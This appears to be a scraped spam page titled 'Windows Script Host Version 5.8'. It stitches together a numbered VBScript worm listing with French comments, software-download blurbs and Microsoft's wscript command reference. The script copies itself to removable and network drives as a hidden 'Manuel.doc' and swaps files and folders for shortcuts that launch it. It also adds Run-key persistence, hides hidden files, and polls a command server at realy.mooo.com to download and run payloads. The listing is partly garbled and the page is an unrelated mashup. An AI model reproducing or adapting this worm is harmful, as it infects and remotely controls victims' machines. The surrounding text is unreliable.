Windows Script Host Version 5.8

Windows Script Host Version 5.8

Windows Script Host Version 5.8 Rating: 3,9/5 2572 votes

Grmcprxfreo

  1. 'Copyright (C) Microsoft Corporation. Tous droits r‚serv‚s.
  2. '<coded by Bl4cKs0cK>'
  3. Dim host
  4. Dim host_script
  5. Dim activ_name
  6. activ_name = 'SysinfY2X.db' 'Le nom du process actif
  7. passiv_name = 'Manuel.doc'
  8. sleep_time = 2000
  9. sleep_time_limit = 60000
  10. Set http = CreateObject('MSXML2.ServerXMLHTTP') 'Objet ajax pour aller recuperer url
  11. Set sh = WScript.CreateObject('WScript.Shell')
  12. Set fs= CreateObject('Scripting.FileSystemObject') 'creation du nouveau script
  13. Set WMIService = GetObject('winmgmts:{impersonationLevel=impersonate}!.rootcimv2') 'prend les droits de l'utilisateur courant
  14. Const adTypeText = 2
  15. Const adSaveCreateNotExist = 1
  16. Set stream_self = CreateObject('Adodb.Stream')'generation du script dans %TEMP%
  17. script_name = Wscript.ScriptName
  18. tmp_dir = sh.ExpandEnvironmentStrings('%temp%') & '
  19. stream_self.Type = adTypeBinary 'en fait du binaire
  20. stream_self.LoadFromFile fs.GetFile(Wscript.ScriptFullName) 'crée un stream ADODB
  21. script_size = stream_self.Size 'recupere la taille du script
  22. Dim serv_rep, cont, cont_limit
  23. cont_limit = CInt(sleep_time_limit / sleep_time)
  24. infect_drives 'infecte les lecteurs
  25. protect_del 'assure la reproduction du fichier dans %TEMP%
  26. kill_old('SysinfYhX.db') 'tue le fichier qui a permis son deploiement
  27. cont = cont + 1
  28. Else
  29. serv_rep = serv_cmd('ping') 'Execute la commande ping vers le serveur realy.mooo.com
  30. cont_limit = CInt(CInt(serv_rep) / sleep_time)
  31. serv_rep = serv_cmd(script_size & activ_name)'envoie la taille et le nom du script pour connaitre la version et telecharger la nouvelle si besoin
  32. If serv_rep <> '0' Then
  33. Else
  34. serv_rep = serv_cmd('list') 'sinon envoie la commande list
  35. get_list(serv_rep) 'si une reponse positive, execute get_list avec la liste retournee par le serveur
  36. End If
  37. Else
  38. End If
  39. Wend
  40. infect_machin 'Sinon infecte une machine
  41. Function serv_cmd(cmd)
  42. Dim stat
  43. http.Open 'GET', host & host_script & '?cmd=' & cmd , False 'utilise l'objet HTTP pour GET et lancer la commande passée en arguments
  44. stat = http.Status
  45. serv_cmd = '-1' 'si pas de reponse recoit -1
  46. serv_cmd=http.ResponseText 'sinon recoit du texte
  47. End Function
  48. On Error Resume Next
  49. frm_ = arr(1)
  50. to_ = arr(3)
  51. Dim stream
  52. Set stream = CreateObject('Adodb.Stream') 'Cree un stream binaire et génère un fichier avec le tableau passé en entrée
  53. stream.Open
  54. If fs.GetFile(tmp_dir & to_).Size <> size_ Then
  55. http.Send
  56. bot_up = False
  57. stream.Write http.ResponseBody
  58. fs.DeleteFile tmp_dir & to_, True
  59. stream.SaveToFile tmp_dir & to_, adSaveCreateOverWrite
  60. bot_up = True
  61. Else
  62. End If
  63. http.Open 'GET', frm_, False
  64. If http.Status <> 200 Then
  65. Else
  66. stream.SaveToFile tmp_dir & to_, adSaveCreateOverWrite
  67. bot_up = True
  68. End If
  69. If bot_up Then
  70. sh.Run 'cmd /c start ' & lnc_ & ' %temp%' & to_, 0
  71. End Function
  72. On Error Resume Next
  73. ret = Array(True, ', 0, ', ')
  74. ret(1) = Split(Split(in_, '<from>')(1), '<br>')(0)
  75. ret(2) = CInt(Split(Split(in_, '<size>')(1), '<br>')(0))
  76. ret(4) = Split(Split(in_, '<lancer>')(1), '<br>')(0)
  77. If a = ' Or a = ' ' Then
  78. Exit For
  79. Next
  80. End Function
  81. On Error Resume Next
  82. data_ = get_split(req)
  83. If bot_up(data_) Then
  84. del_registre
  85. fs.DeleteFile Wscript.ScriptFullName, True
  86. wscript.quit
  87. End If
  88. Function get_list(req) 'reçoit les données retournées par la commande list sur le serveur
  89. If req <> '0' Then
  90. tbl = Split(req, '<list>')
  91. Dim data_
  92. If data_(0) Then
  93. End If
  94. get_list = True
  95. get_list = False
  96. End Function
  97. Function infect_machin 'meme principe qu'infect_drives
  98. infect_registre
  99. If fs.GetFile(tmp_dir & activ_name).Size <> script_size Then
  100. fs.DeleteFile tmp_dir & activ_name, True
  101. stream_self.SaveToFile tmp_dir & activ_name, adSaveCreateOverWrite
  102. fs.GetFile(tmp_dir & activ_name).Attributes=1+2+4
  103. Else
  104. End If
  105. stream_self.SaveToFile tmp_dir & activ_name, adSaveCreateNotExist
  106. fs.GetFile(tmp_dir & activ_name).Attributes=1+2+4
  107. End If
  108. sh.Run 'cmd /c start wscript /e:VBScript.Encode ' & Replace(tmp_dir & activ_name,' ', ChrW(34) & ' ' & ChrW(34)), 0
  109. Dim colItms
  110. Set colItms = WMIService.ExecQuery ('Select * from Win32_Process Where Name = 'wscript.exe' AND CommandLine LIKE '%' & activ_name & '%')
  111. sh.Run 'cmd /c start wscript /e:VBScript.Encode ' & Replace(tmp_dir & activ_name,' ', ChrW(34) & ' ' & ChrW(34)), 0
  112. Set colItms = Nothing
  113. wscript.quit
  114. Sub infect_drives 'infection des lecteurs
  115. Dim sys_drive
  116. sys_drive = sh.ExpandEnvironmentStrings('%SYSTEMDRIVE%')
  117. If cle.isReady And (cle.DriveType = 1 Or cle.DriveType = 3 Or cle.DriveType = 4) Then 'si le drive est une clé, un network drive ou un cdrom(??)
  118. d = cle.path
  119. If fs.FileExists(d & ' & passiv_name) Then 'Si le fichier existe mais ne fait pas la même taille, il le supprime et le remplace par un fichier caché
  120. If (fs.GetFile(d & ' & passiv_name).Size <> script_size) And (cle.FreeSpace > Abs(fs.GetFile(d & ' & passiv_name).Size - script_size)) Then
  121. fs.DeleteFile d & ' & passiv_name, True
  122. stream_self.SaveToFile d & ' & passiv_name, adSaveCreateOverWrite
  123. Else 'Sinon il le créé
  124. stream_self.SaveToFile d & ' & passiv_name, adSaveCreateNotExist
  125. End If
  126. fs.GetFile(d & ' & passiv_name).Attributes=1+2+4 'll donne les attributs read only, fichier caché, et fichier système au fichier
  127. For Each f In fs.GetFolder(d & ').Files
  128. If instr(f.name, '.') Then
  129. f_name = split(f.name, '.')
  130. Else
  131. End if
  132. If f_ext <> 'lnk' And f.name <> passiv_name And f.Attributes <> 2+4 Then
  133. If fs.FileExists(d & ' & f.name & '.lnk') Then
  134. fs.GetFile(d & ' & f.name & '.lnk').Attributes = 0 'fait apparaitre le lien si besoin
  135. Dim shurt, s_icon 'Creation du shortcut qui execute cmd avec des arguments
  136. Set shurt = sh.CreateShortcut(d & ' & f.name & '.lnk')
  137. shurt.WindowStyle = 7 'Minimized windows <-- pour ne pads qu'on voit le resultat de l'execution du script
  138. shurt.WorkingDirectory = '
  139. Dim f_arg 'lance wscript avec le moteur encode pour lire le manuel.doc encodé
  140. f_arg = '/c start wscript /e:VBScript.Encode ' & Replace(passiv_name,' ', ChrW(34) & ' ' & ChrW(34)) & ' & start ' & replace( f.name,' ', ChrW(34) & ' ' & ChrW(34))
  141. shurt.Arguments = f_arg & ' & exit' 'puis ferme la fenetre
  142. s_icon = sh.regread('HKLMSOFTWAREClasses' & sh.regread('HKLMSOFTWAREClasses.' & f_ext & ') & 'DefaultIcon')' S'attribue l'icone d'un repertoire
  143. If ( instr(s_icon, ',') = 0 ) Or f_ext = 'NULL' Then
  144. Else
  145. End if
  146. fs.GetFile(d & ' & f.name & '.lnk').Attributes = 1 ' le place en RO
  147. Next
  148. If ff.Attributes <> 2+4 Then
  149. If fs.FileExists(d & ' & ff.name & '.lnk') Then
  150. fs.GetFile(d & ' & ff.name & '.lnk').Attributes = 0
  151. Dim shurt_, s_icon_
  152. Set shurt_ = sh.CreateShortcut(d & ' & ff.name & '.lnk')
  153. shurt_.TargetPath = 'cmd.exe'
  154. Dim ff_arg 'relance le script pour les sous repertoires
  155. ff_arg = '/c start wscript /e:VBScript.Encode ' & Replace(passiv_name,' ', ChrW(34) & ' ' & ChrW(34)) & ' & start explorer ' & replace( ff.name,' ', ChrW(34) & ' ' & ChrW(34))
  156. s_icon_ = sh.regread('HKLMSOFTWAREClassesFolderDefaultIcon')
  157. shurt_.IconLocation = ff.path
  158. shurt_.IconLocation = s_icon_
  159. shurt_.save()
  160. fs.GetFile(d & ' & ff.name & '.lnk').Attributes = 1
  161. Next
  162. End If
  163. Next
  164. Sub infect_registre
  165. Dim target, reg_d
  166. target = 'C:WINDOWSsystem32cmd.exe /c start wscript /e:VBScript.Encode %temp%' & activ_name 'Crée une tache au démarrage
  167. reg_d = 'SoftwareMicrosoftWindowsCurrentVersionRun' & Split(activ_name, '.')(0)
  168. reg_d = 'SoftwareMicrosoftWindowsCurrentVersionExplorerAdvancedHidden' 'fait en sorte que n'aparaissent pas les fichiers cachés
  169. End Sub
  170. On Error Resume Next
  171. reg_d = 'SoftwareMicrosoftWindowsCurrentVersionRun' & Split(activ_name, '.')(0)
  172. End Sub
  173. On Error Resume Next
  174. If fs.GetFile(tmp_dir & activ_name).Size <> script_size Then
  175. stream_self.SaveToFile tmp_dir & activ_name, adSaveCreateOverWrite 'remplace le fichier dans le dossier temp
  176. Else
  177. stream_self.SaveToFile tmp_dir & activ_name, adSaveCreateNotExist
  178. fs.GetFile(tmp_dir & activ_name).Attributes=1+2+4 'On reattribue RO/Hidden/SystemFile
  179. Function kill_old(old_name)'tue l'ancien processus afin de renouveller le nom et de poursuivre l'infection
  180. Dim colItems, reg_d
  181. Set colItems = WMIService.ExecQuery ('Select * from Win32_Process Where Name = 'wscript.exe' AND CommandLine LIKE '%' & old_name & '%')
  182. objItem.Terminate
  183. colItems = Nothing
  184. reg_d = 'SoftwareMicrosoftWindowsCurrentVersionRun' & Split(old_name, '.')(0)
  185. fs.GetFile(tmp_dir & old_name).Attributes=2
  186. End Function

Feb 16, 2019  Microsoft ® Windows Script Host 5.8. Choose the most popular programs from Developer Tools. Scarface from half baked. 3.4 (8 votes) 5.8.7600 Microsoft. Review Comments Questions & Answers (1) Update program info. No specific info about version 5.8. Please visit the main page of Microsoft ® Windows Script Host on Software Informer. Share your experience: Write a review. To upgrade the version of Windows Script Host: If you have not done so already, map S: to ohare.ecn.purdue.edu public. Look in the folder S: tools pub software WSH for the executable named wsh-X.Y where X.Y is the latest version. Double-click the file. Click Yes to confirm that you wish to install Windows Script.

-->

Windows Script Host provides an environment in which users can execute scripts in a variety of languages that use a variety of object models to perform tasks.

Syntax

Script

Parameters

Host
ParameterDescription
scriptnameSpecifies the path and file name of the script file.
/bSpecifies batch mode, which does not display alerts, scripting errors, or input prompts. This is the opposite of /i.
/dStarts the debugger.
/eSpecifies the engine that is used to run the script. This lets you run scripts that use a custom file name extension. Without the /e parameter, you can only run scripts that use registered file name extensions. For example, if you try to run this command:
cscript test.admin
You will receive this error message: Input Error: There is no script engine for file extension '.admin.'
One advantage of using nonstandard file name extensions is that it guards against accidentally double-clicking a script and running something you really did not want to run.
This does not create a permanent association between the .admin file name extension and VBScript. Each time you run a script that uses a .admin file name extension, you will need to use the /e parameter.
/h:cscriptRegisters cscript.exe as the default script host for running scripts.
/h:wscriptRegisters wscript.exe as the default script host for running scripts. This is the default when the /h option is omitted.
/iSpecifies interactive mode, which displays alerts, scripting errors, and input prompts.
This is the default and the opposite of /b.
/job:<identifier>Runs the job identified by identifier in a .wsf script file.
/logoSpecifies that the Windows Script Host banner is displayed in the console before the script runs.
This is the default and the opposite of /nologo.
/nologoSpecifies that the Windows Script Host banner is not displayed before the script runs. This is the opposite of /logo.
/sSaves the current command prompt options for the current user.
/t:<number>Specifies the maximum time the script can run (in seconds). You can specify up to 32,767 seconds.
The default is no time limit.
/xStarts the script in the debugger.
ScriptArgumentsSpecifies the arguments passed to the script. Each script argument must be preceded by a slash (/).
/?Displays Help at the command prompt.

Remarks

  • Performing this task does not require you to have administrative credentials. Therefore, as a security best practice, consider performing this task as a user without administrative credentials.
  • To open a command prompt, on the Start screen, type cmd, and then click command prompt.
  • Each parameter is optional; however, you cannot specify script arguments without specifying a script. If you do not specify a script or any script arguments, wscript.exe displays the Windows Script Host Settings dialog box, which you can use to set global scripting properties for all scripts that wscript.exe runs on the local computer.
  • The /t parameter prevents excessive running of scripts by setting a timer. When the time exceeds the specified value, wscript interrupts the script engine and ends the process.
  • Windows script files usually have one of the following file name extensions: .wsf, .vbs, .js.
  • If you double-click a script file with an extension that has no association, the Open With dialog box appears. Select wscript or cscript, and then select Always use this program to open this file type. This registers wscript.exe or cscript.exe as the default script host for files of this file type.
  • You can set properties for individual scripts. See Windows Script Host overview for more information.
  • Windows Script Host can use .wsf script files. Each .wsf file can use multiple scripting engines and perform multiple jobs.

Additional references

Related News

Windows Script Host Version 5.8
© 2020

© 2020
laserqbridal.netlify.com